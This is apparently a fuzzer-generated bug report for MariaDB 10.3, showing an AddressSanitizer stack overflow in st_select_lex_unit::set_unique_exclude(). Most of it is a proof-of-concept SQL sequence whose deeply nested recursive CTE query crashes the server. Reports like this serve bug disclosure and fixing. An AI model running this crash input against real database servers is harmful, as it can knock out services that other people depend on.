output:
SUMMARY: AddressSanitizer: stack-overflow /home/wsh/database_fuzz/mysql_fuzz/Mariadb_10.3/sql/sql_union.cc:2837 in st_select_lex_unit::set_unique_exclude()
poc:
CREATE TEMPORARY TABLE x ( x TEXT ( 1 ) CHECK ( FALSE NOT LIKE x * 1 = 1 + 1 ^ 1 ) ) ;
|
INSERT INTO x ( x ) VALUES ( 1 ) ;
|
UPDATE x SET x = 1 ;
|
INSERT INTO x ( x ) VALUES ( 1 ) , ( 1 ) ;
|
WITH x AS ( SELECT x FROM x ORDER BY 1.000000 ) SELECT EXISTS ( WITH RECURSIVE x ( x ) AS ( WITH x AS ( SELECT x FROM ( SELECT x FROM ( SELECT 1 AS x , 1 FROM x WHERE x = CASE WHEN x * ( SELECT 1 FROM x AS x WHERE x BETWEEN 1.000000 AND 1 WINDOW x AS ( ORDER BY x - x , ( 1 < x AND x = 1 ) ) ) ^ x THEN 1.000000 ELSE x END / 1 GROUP BY x ) AS x ) AS x WHERE ( x = 1 OR x = 1 ) NOT LIKE 'x' AND x * 1 ) SELECT NOT ( ( 1.000000 ^ 1.000000 AND 1.000000 = ( SELECT x FROM x ) * 1 + 1 ^ 1 ) * ( x = 1 OR x = 1 ) NOT LIKE 'x' ) AS x UNION SELECT 1 - x LIMIT 1 ) SELECT DISTINCT ( NOT ( NOT ( NOT ( x = 'x' AND x = 'x' AND x = 'x' ) ) IS NULL ) ) AS x , ( ( TRUE , x ) NOT IN ( SELECT ( x % ( SELECT x FROM x WHERE 1 = x ) <= x ) , ( x = 1 AND x = 1 ) FROM x ) OR x > 'x' ) FROM x ) , 'x' FROM x WINDOW x AS ( PARTITION BY x ORDER BY x DESC ) ORDER BY x , x DESC ;
|
Bug
Critical
